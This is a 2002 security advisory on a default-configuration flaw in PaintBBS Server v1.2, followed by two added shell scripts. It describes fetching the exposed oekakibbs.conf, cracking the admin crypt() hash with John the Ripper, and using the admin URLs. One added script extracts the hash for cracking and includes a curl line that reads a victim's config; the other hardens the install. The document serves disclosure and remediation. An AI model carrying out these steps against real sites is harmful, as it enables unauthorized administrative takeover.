PaintBBS Server v1.2 Advisory

Author:          John Bissell A.K.A. HighT1mes
Vulnerable:      PaintBBS Server Ver.1.2 Build 010514
Impact:          PaintBBS Server 0wn3d (remote administrative access)
Release Date:    January 22, 2002
Contact:         blumorpho@cox.net
Vendor Homepage: http://www.ax.sakura.ne.jp/~aotama/

------------------------------------------------------------------------------------------

Introduction:

PaintBBS Server v1.2 is a neat web application that lets people draw pictures as well as leave messages, like a normal BBS. A few days ago I learned about this app and decided to test some of its security for fun. Since the documentation is in Japanese it took a little time to figure out which files did what.

The main file to be aware of is oekakibbs.conf. By default anyone can read this file over the web, and it contains the crypt()-hashed password for the PaintBBS Server administrator. The other problem is that the /oekaki/ folder is installed with permissions 777, which makes it world-writable and, on a web server that has directory indexes enabled, lets anyone browse its contents. So if I don't know what the .conf file is named I can simply open that folder in a web browser and see.

I haven't tested any other version of this software yet. PaintBBS Server is actually up to v2.40, so if anyone wants to continue the investigation, have fun! :p

Problem Description:

This is one of those default-configuration problems. A malicious person can read the oekaki config file from the web, take the hashed password out of it and crack it offline, which gives them admin access to the server.

As an example, if I wanted to remotely take over http://www.victim.com/oekaki/oekaki.cgi I would first request the config file, which by default lives in the /oekaki/ directory at http://www.victim.com/oekaki/oekakibbs.conf. If that didn't work I would point my web browser at the /oekaki/ folder itself, read the directory listing to see what the .conf files are named, and request them. Once I could view the config file I would see something like this...

password=m8kl78sKTixvs
...
etc

Now that I have the hashed password, I would feed it to a standard crypt()/DES password cracker (I prefer John the Ripper), since PaintBBS stores the password as the output of crypt(): a 13-character traditional DES hash whose first two characters are the salt. If you use John the Ripper, put the hash into a line in Unix /etc/passwd format in a text file and run John on that file. Traditional DES crypt() only uses the first eight characters of the password, so the search space is small and a weak password falls quickly.

Now that I have the cracked password, I would go over to one of the following admin URLs to have some fun..

http://www.victim.com/oekaki/oekaki.cgi?mode=administration
http://www.victim.com/oekaki/oekaki.cgi?mode=deleteUserCommentView

Solution:

To solve this security problem, first change the permissions of the /oekaki/ folder from 777 to something more restrictive using the chmod command. The point is to remove write access for everyone except the account the CGI runs as (it still has to store drawings and comments there), for example 755 with that account as the owner; a mode like 333 hides the directory listing but leaves the folder world-writable, so it does not fix the problem. Next, rename the oekakibbs.conf file so nobody can guess its URL, and turn off directory indexes so the new name cannot simply be read from a listing. Finally, if your web server supports it, deny HTTP access to the config file as well (on Apache, a per-directory .htaccess rule does this). File-system permissions alone cannot keep the file private from the web server, because the same server has to read it to run the CGI, so the server itself must be told not to serve it.

Have a good day!

------------------------------------------------------------------------------------------

Thank you to Chris_Judah and Hiroshi :)
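The cracking step described in the Problem Description, as an added shell example that is not part of the original advisory: it takes the text of a fetched oekakibbs.conf, pulls out the password= value, checks that it has the shape of a traditional DES crypt() hash, and prints the /etc/passwd-style line the advisory says to hand to John the Ripper. The config text is constructed here to mirror the advisory's sample (the hash is the one shown above); the user name "oekaki" in the output line and the www.victim.com URL in the comment are placeholders, not anything from the page.

```shell
#!/bin/sh
# Added example, not from the PaintBBS advisory or the vendor.
# Given the text of oekakibbs.conf, extract the admin password hash and
# format it for John the Ripper as the advisory describes.

# Constructed sample of a config file in the shape the advisory shows
# (the password value is the advisory's own example hash).
SAMPLE_CONF='title=PaintBBS
password=m8kl78sKTixvs
maxcomment=100'

# Print the value of the first password= line in the config text given as $1.
# Strips a trailing CR in case the file was written on Windows.
conf_password() {
    printf '%s\n' "$1" | sed -n 's/^password=//p' | tr -d '\r' | head -n 1
}

# Succeed if $1 looks like traditional DES crypt(3) output: exactly 13
# characters from the crypt alphabet [./0-9A-Za-z], the first two being the salt.
is_des_crypt() {
    printf '%s' "$1" | grep -Eq '^[./0-9A-Za-z]{13}$'
}

# Print one /etc/passwd-style line for john. "oekaki" is a placeholder user
# name; only the second field (the hash) matters to the cracker.
john_line() {
    printf 'oekaki:%s:0:0:PaintBBS admin:/:/bin/sh\n' "$1"
}

# In a real run the config text would come from the target, e.g.
#   conf=$(curl -s http://www.victim.com/oekaki/oekakibbs.conf)
# Here the constructed sample is used so the script runs offline.
main() {
    conf=${1:-$SAMPLE_CONF}
    hash=$(conf_password "$conf")
    if ! is_des_crypt "$hash"; then
        echo "no 13-character crypt() hash found in config (got '$hash')" >&2
        return 1
    fi
    # Save this line as oekaki.pwd, then: john oekaki.pwd && john --show oekaki.pwd
    john_line "$hash"
}

main
```

Save the printed line as oekaki.pwd and run john oekaki.pwd, then john --show oekaki.pwd to see the result. The format check matters: if the value is not 13 crypt-alphabet characters the application is storing the password some other way and a DES cracker will get nowhere. Because traditional DES crypt() hashes only the first eight characters, the strength of the hash is not what protects the administrator here; keeping the file off the web is.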
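The Solution section, applied as an added shell script that is not from the advisory or the vendor. It assumes Apache 1.3/2.x with .htaccess overrides (AllowOverride) enabled for the directory, and that the directory is owned by the account the CGI runs as, so the CGI keeps write access once world-write is removed. The function names harden_oekaki and mode_of, the directory argument and the .htaccess rules are this example's own.

```shell
#!/bin/sh
# Added example, not from the PaintBBS advisory or the vendor: apply the
# advisory's fixes to a PaintBBS install directory. Assumes Apache with
# .htaccess overrides enabled for that directory, and that the directory is
# owned by the account the CGI runs as.

# Print the symbolic permission string of a path, e.g. drwxr-xr-x
# (first ten columns of ls -ld, which works on both GNU and BSD ls).
mode_of() {
    ls -ld "$1" | cut -c1-10
}

harden_oekaki() {
    dir=$1
    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 1; }

    # 1. Directory: 755 instead of the default 777, so only the owner (the
    #    CGI's account) can create or delete files. 333 would not do this:
    #    it hides the listing but keeps the directory world-writable.
    chmod 755 "$dir"

    # 2. Config file: owner read/write only. Where the CGI runs as the same
    #    account this is all the file system can do; the web server still
    #    has to be told not to serve the file (step 3).
    [ -f "$dir/oekakibbs.conf" ] && chmod 600 "$dir/oekakibbs.conf"

    # 3. Per-directory Apache rules: no directory index, and refuse any
    #    *.conf file over HTTP, so renaming the config is no longer the only
    #    thing between a browser and the password hash. Order/Deny is the
    #    pre-2.4 syntax; Apache 2.4 needs mod_access_compat or
    #    "Require all denied" instead.
    cat > "$dir/.htaccess" <<'EOF'
Options -Indexes
<FilesMatch "\.conf$">
    Order allow,deny
    Deny from all
</FilesMatch>
EOF
    chmod 644 "$dir/.htaccess"
}

# Usage: sh harden_oekaki.sh /path/to/htdocs/oekaki
if [ $# -gt 0 ]; then
    harden_oekaki "$1"
fi
```

After running it, confirm from outside that both paths the advisory uses now fail: curl -sI http://www.victim.com/oekaki/oekakibbs.conf should answer 403 Forbidden, and http://www.victim.com/oekaki/ should no longer return a directory index. If the CGI runs as the web server's account (no suEXEC) while the directory belongs to your shell account, chown the directory to that account before changing the mode, or the CGI will lose its ability to store new drawings.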